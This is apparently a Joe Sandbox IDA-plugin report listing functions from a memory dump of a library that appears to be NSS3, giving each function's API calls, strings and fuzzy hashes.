Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nBl
API String ID: 420000887-2769900274
Opcode ID: e33c1274704451548ff1b12490b3bb45297a574d09789055d7abdd07497716b7
Instruction ID: d20afa77a53f3f323e098c1077638761d46988d06f1d0252cdd22a62d52a2923
Opcode Fuzzy Hash: e33c1274704451548ff1b12490b3bb45297a574d09789055d7abdd07497716b7
Instruction Fuzzy Hash: 44218C756011A4EFDB11FB54DE8CE493BF5EB8622DF048024E518E6622DB328848DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 6C2B2450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C2B24BA
LeaveCriticalSection.KERNEL32(?), ref: 6C2B250D
EnterCriticalSection.KERNEL32(?), ref: 6C2B2554
LeaveCriticalSection.KERNEL32(?), ref: 6C2B25A7
EnterCriticalSection.KERNEL32(?), ref: 6C2B2609
LeaveCriticalSection.KERNEL32(?), ref: 6C2B265F
EnterCriticalSection.KERNEL32(?), ref: 6C2B26A2
LeaveCriticalSection.KERNEL32(?), ref: 6C2B26F5
EnterCriticalSection.KERNEL32(?), ref: 6C2B2764
LeaveCriticalSection.KERNEL32(?), ref: 6C2B2898
EnterCriticalSection.KERNEL32(?), ref: 6C2B28D0
EnterCriticalSection.KERNEL32(?), ref: 6C2B2948
LeaveCriticalSection.KERNEL32(?), ref: 6C2B299B
EnterCriticalSection.KERNEL32(?), ref: 6C2B29E2
LeaveCriticalSection.KERNEL32(?), ref: 6C2B2A31

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 6647e6d3fff453abf3464fd3cb63a73efcd00ca9d0bbb05e38dd65fd096405cc
Instruction ID: 2b6098571126deb46975eafddbf84f3dbca1ad7e656ab39c8e9d4b2751a62c95
Opcode Fuzzy Hash: 6647e6d3fff453abf3464fd3cb63a73efcd00ca9d0bbb05e38dd65fd096405cc
Instruction Fuzzy Hash: A3F1C371A01725CBDF09FF21D99DA7A3370BF0B359B180129ED466BA15CB359841CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C3E2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C3E2D9F

Part of subcall function 6C29CA30: EnterCriticalSection.KERNEL32(?,?,?,6C2FF9C9,?,6C2FF4DA,6C2FF9C9,?,?,6C2C369A), ref: 6C29CA7A
Part of subcall function 6C29CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C29CB26

sqlite3_exec.NSS3(?,?,6C3E2F70,?,?), ref: 6C3E2DF9
sqlite3_free.NSS3(00000000), ref: 6C3E2E2C
sqlite3_free.NSS3(?), ref: 6C3E2E3A
sqlite3_free.NSS3(?), ref: 6C3E2E52
sqlite3_mprintf.NSS3(6C44AAF9,?), ref: 6C3E2E62
sqlite3_free.NSS3(?), ref: 6C3E2E70
sqlite3_free.NSS3(?), ref: 6C3E2E89
sqlite3_free.NSS3(?), ref: 6C3E2EBB
sqlite3_free.NSS3(?), ref: 6C3E2ECB
sqlite3_free.NSS3(00000000), ref: 6C3E2F3E
sqlite3_free.NSS3(?), ref: 6C3E2F4C

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: ed7d28050d3b73eed192b964b44c852ad41345c4c9578e12bed6a30b6425535b
Instruction ID: abd24c48a744858f362611f1b9ae802f1ca787848d8227cb61f783b0c7be8628
Opcode Fuzzy Hash: ed7d28050d3b73eed192b964b44c852ad41345c4c9578e12bed6a30b6425535b
Instruction Fuzzy Hash: 286191B5E0022A8BEB00CFA5D985BDEB7B5AF88348F144025ED55A7700E732E855CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C294C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CB0
PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D97
PR_Lock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294DBA
PR_WaitCondVar.NSS3 ref: 6C294DD4
PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294DEF

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: a46c3d0696db6183d5e41701b9fe6a8e8a9ffbae97b2e8602150b845593dd24c
Instruction ID: 1f1a5307c9f21cb862c941144829ad368ec9387872c38ffff839f4a115e042a7
Opcode Fuzzy Hash: a46c3d0696db6183d5e41701b9fe6a8e8a9ffbae97b2e8602150b845593dd24c
Instruction Fuzzy Hash: C4418DB5A14719CFCB01FF7AD094569BBB0BF06315F054629EC989B710EB30D884CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C346C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C346C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C346C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C346CA3

Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963

PR_LogPrint.NSS3(?,00000000), ref: 6C346CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C346CD5

Strings

C_DigestInit, xrefs: 6C346C61
pMechanism = 0x%p, xrefs: 6C346CD0
(CK_INVALID_HANDLE), xrefs: 6C346C9C
hSession = 0x%x, xrefs: 6C346C7E, 6C346C8E
nBl, xrefs: 6C346CF4, 6C346D1F

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nBl
API String ID: 1003633598-3110559346
Opcode ID: ea9e5ba47ca24309a25b89ff5e0367a295ebbfab66b527f4e8c976388449e39a
Instruction ID: aaf8fccf8015dfc904caa09d549e09a8f10f265a90eacefb6b11f32683f1a4c3
Opcode Fuzzy Hash: ea9e5ba47ca24309a25b89ff5e0367a295ebbfab66b527f4e8c976388449e39a
Instruction Fuzzy Hash: 8021C131A011649BDB11FF559D89F9A37F5EB4622CF048029E909D7A12DF359908CFF2

Uniqueness

Uniqueness Score: -1.00%

Function 6C35ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C35DE64), ref: 6C35ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C35ED22

Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095

PL_FreeArenaPool.NSS3(?), ref: 6C35ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C35ED6B
PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C35ED38

Part of subcall function 6C294C70: TlsGetValue.KERNEL32(?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294C97
Part of subcall function 6C294C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CB0
Part of subcall function 6C294C70: PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C35ED52
PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C35ED83
PL_FreeArenaPool.NSS3(?), ref: 6C35ED95
PL_FinishArenaPool.NSS3(?), ref: 6C35ED9D

Part of subcall function 6C3764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C37127C,00000000,00000000,00000000), ref: 6C37650E

Strings

security, xrefs: 6C35ED06

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: ae47cb344b5f6c6670261ef15e7caf496af1ac64d8e9b77284edd15cc0277482
Instruction ID: e6fb8a5d40466a364c40762f88522a3deffc196c87188f4fa5f36a3b010c433a
Opcode Fuzzy Hash: ae47cb344b5f6c6670261ef15e7caf496af1ac64d8e9b77284edd15cc0277482
Instruction Fuzzy Hash: 741108769003146EEA309625AC54FFB73B8AF0160CF450525EC9466E41FB2DA5289EFB

Uniqueness

Uniqueness Score: -1.00%

Function 6C384DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C384DCB

Part of subcall function 6C370FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3187ED,00000800,6C30EF74,00000000), ref: 6C371000
Part of subcall function 6C370FF0: PR_NewLock.NSS3(?,00000800,6C30EF74,00000000), ref: 6C371016
Part of subcall function 6C370FF0: PL_InitArenaPool.NSS3(00000000,security,6C3187ED,00000008,?,00000800,6C30EF74,00000000), ref: 6C37102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C384DE1

Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C384DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C384E59

Part of subcall function 6C36FAB0: free.MOZGLUE(?,-00000001,?,?,6C30F673,00000000,00000000), ref: 6C36FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C44300C,00000000), ref: 6C384EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C384EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C384F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C38521A

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 9beea0f9dd30d4960b4878d0d552c2d02fa36d9347a8b66ba2f8bc135e65c87a
Instruction ID: 0a634aec27b165d740aac27eab5c34610771c736de1462922cacd2f51b31b8be
Opcode Fuzzy Hash: 9beea0f9dd30d4960b4878d0d552c2d02fa36d9347a8b66ba2f8bc135e65c87a
Instruction Fuzzy Hash: 98F1AD71E02209CBEB04CF54D8507ADB7B6FF44358F258169E816ABB80E736E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C302D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C302D69

Strings

Bl, xrefs: 6C302DD0
winSeekFile, xrefs: 6C302E9C
@Bl, xrefs: 6C302E24
winTruncate2, xrefs: 6C302EF8
PBl, xrefs: 6C302E74, 6C302EC5, 6C302F32, 6C302F5C
winUnmapfile1, xrefs: 6C302F55
winUnmapfile2, xrefs: 6C302F7F
winTruncate1, xrefs: 6C302EBE

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: __allrem
String ID: @Bl$PBl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Bl
API String ID: 2933888876-2286440648
Opcode ID: 1d4ff387db78f8dbe87a03ff798b4aff973b86d1febfe7f26518cda110d4bc4b
Instruction ID: 3153f74c89784c8761aac540441659154511a8c29a0b055449de64013967e0fb
Opcode Fuzzy Hash: 1d4ff387db78f8dbe87a03ff798b4aff973b86d1febfe7f26518cda110d4bc4b
Instruction Fuzzy Hash: 0B61B272B402149FDB04DF68DC88A6A77F1FF49358F108529E9159B790DB32AC06CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C292400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C2924EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C292315), ref: 6C29254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C292315), ref: 6C29256C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C2924F4, 6C292557
misuse, xrefs: 6C292561
bind on a busy prepared statement: [%s], xrefs: 6C2924E6
API called with finalized prepared statement, xrefs: 6C292543, 6C29254D
API called with NULL prepared statement, xrefs: 6C29253C
%s at line %d of [%.10s], xrefs: 6C292566

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: 37b5a6b78f77d61ee955a00a24609f194615db4df2b65d41f303573ee8187176
Instruction ID: 84b4ab17531b4a64d0b8dae0362f8a1c8eeaeed7cf43e0b063617f7eeb2acb76
Opcode Fuzzy Hash: 37b5a6b78f77d61ee955a00a24609f194615db4df2b65d41f303573ee8187176
Instruction Fuzzy Hash: 1F4120B1700609CBE714DF1AEC98F6673B6BF81719F24492CEC095BB40DB76E8158B91

Uniqueness

Uniqueness Score: -1.00%

Function 6C36A470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C36A4A6

Part of subcall function 6C370840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C3708B4

PORT_Alloc_Util.NSS3(?), ref: 6C36A4EC

Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C36A527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C36A56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C36A583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C36A596
free.MOZGLUE(?), ref: 6C36A5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C36A5B6

Strings

^j2l, xrefs: 6C36A475

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID: ^j2l
API String ID: 3906949479-3869413497
Opcode ID: e9ba618af170a7fe14f45074c32f1b07efd34fec2159845a6bd15d0fabe3f2e2
Instruction ID: bf2b274a39cf066aaf1637f2456e4bcf036dd1ec632c14e8dd757103a501fb23
Opcode Fuzzy Hash: e9ba618af170a7fe14f45074c32f1b07efd34fec2159845a6bd15d0fabe3f2e2
Instruction Fuzzy Hash: 73410931A002519FDB10DF5ACC40B9ABBB5AF40308F148458DA995BF46E731E919CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C316DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C317D8F,6C317D8F,?,?), ref: 6C316DC8

Part of subcall function 6C36FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C36FE08
Part of subcall function 6C36FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C36FE1D
Part of subcall function 6C36FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C36FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C317D8F,?,?), ref: 6C316DD5

Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C438FA0,00000000,?,?,?,?,6C317D8F,?,?), ref: 6C316DF7

Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C316E35

Part of subcall function 6C36FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C36FE29
Part of subcall function 6C36FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C36FE3D
Part of subcall function 6C36FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C36FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C316E4C

Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C438FE0,00000000), ref: 6C316E82

Part of subcall function 6C316AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C31B21D,00000000,00000000,6C31B219,?,6C316BFB,00000000,?,00000000,00000000,?,?,?,6C31B21D), ref: 6C316B01
Part of subcall function 6C316AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C316B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C316F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C316F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C438FE0,00000000), ref: 6C316F6B
PR_SetError.NSS3(FFFFE005,00000000,6C317D8F,?,?), ref: 6C316FE1

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: c5ef1cb5ea6e1a282bff72af4f98fb3ff47d2d81aae5fc2f4cb6823dcf3e81c1
Instruction ID: 4ac74e0fa6b4a3ccb6881a052499b6fc8e96d67e38ff32fe88a4a2d9b5c4f095
Opcode Fuzzy Hash: c5ef1cb5ea6e1a282bff72af4f98fb3ff47d2d81aae5fc2f4cb6823dcf3e81c1
Instruction Fuzzy Hash: C8719C71D142469FEB04CF55CD40BAABBB8FF94348F154229E848DBA11E731EA94CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C334CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C33AB7F,?,00000000,?), ref: 6C334CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C33AB7F,?,00000000,?), ref: 6C334CC8
